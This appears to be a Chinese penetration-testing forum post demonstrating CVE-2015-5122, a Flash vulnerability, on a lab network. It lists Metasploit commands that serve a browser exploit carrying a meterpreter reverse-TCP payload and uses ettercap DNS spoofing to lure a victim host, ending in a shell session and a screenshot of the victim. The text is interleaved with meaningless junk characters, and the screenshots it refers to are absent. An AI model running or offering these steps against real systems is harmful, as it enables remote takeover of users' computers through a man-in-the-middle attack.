3 p5 h: N% @: ]; m# p' i 二、cve2015-5122漏洞实例演示虚拟机 # W* s% N' N2 }' u. W4 M1 R" {
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
/ m$ u' N$ n; e5 \search cve-2015-5122如图: . A0 ^* J7 d2 F+ t* z) I
' {4 _1 M& ^, i6 u
# z& z* c. R4 F3 P/ N5 T7 h 下面我们敲如下命令: ! i+ H# S \" f& f, A7 y2 s
use exploit/multi/browser/adobe_flash_opaque_background_uaf ) X# I" s2 r: d( r8 z2 j
set PAYLOAD windows/meterpreter/reverse_tcp
2 r5 A% e8 a' ?5 W( Yset LHOST 192.168.0.109
* [+ ?) d# e' ?* ]0 c, c set URIPATH / /*根目录*/ & n3 w" ?! D% g. r& p$ J" F
K: Q: F1 c: a# |/ R6 ~& U1 n6 y/ F set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 7 V* _ g$ m" j3 ~9 C1 Y
$ Y- o8 q: x* _' r8 g* s4 j- ] k+ x8 S1 r9 X3 Q set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 / f7 U) D+ |) {8 P4 [+ Y
+ x- T7 _5 ]: \1 a6 e* z2 x3 l2 F' p0 Y 然后show options如图: $ Y1 x5 P, u; K' j
5 K6 Y4 m5 a ]6 E
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
+ I! ]1 F0 a* ?
9 ^8 ] q8 l+ K: j3 F/ _+ g+ H$ n
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
+ q( Q! k/ @$ r7 m) X% X6 n
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf * @' q$ B. ], @
# N9 t1 n% o! X5 o8 O, v
, F! K6 _; w( K
成功了,这时候我们断开ettercap,如图:
, [0 ?9 T5 L7 C
# F7 w& }: y& g) p. W Screenshot如图: 6 a+ h3 J' ]3 V D7 s
% N9 h% y2 z& T' D& L+ | I
4 R! ]+ b, F% h2 T! F* |* Z# _+ y+ k
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |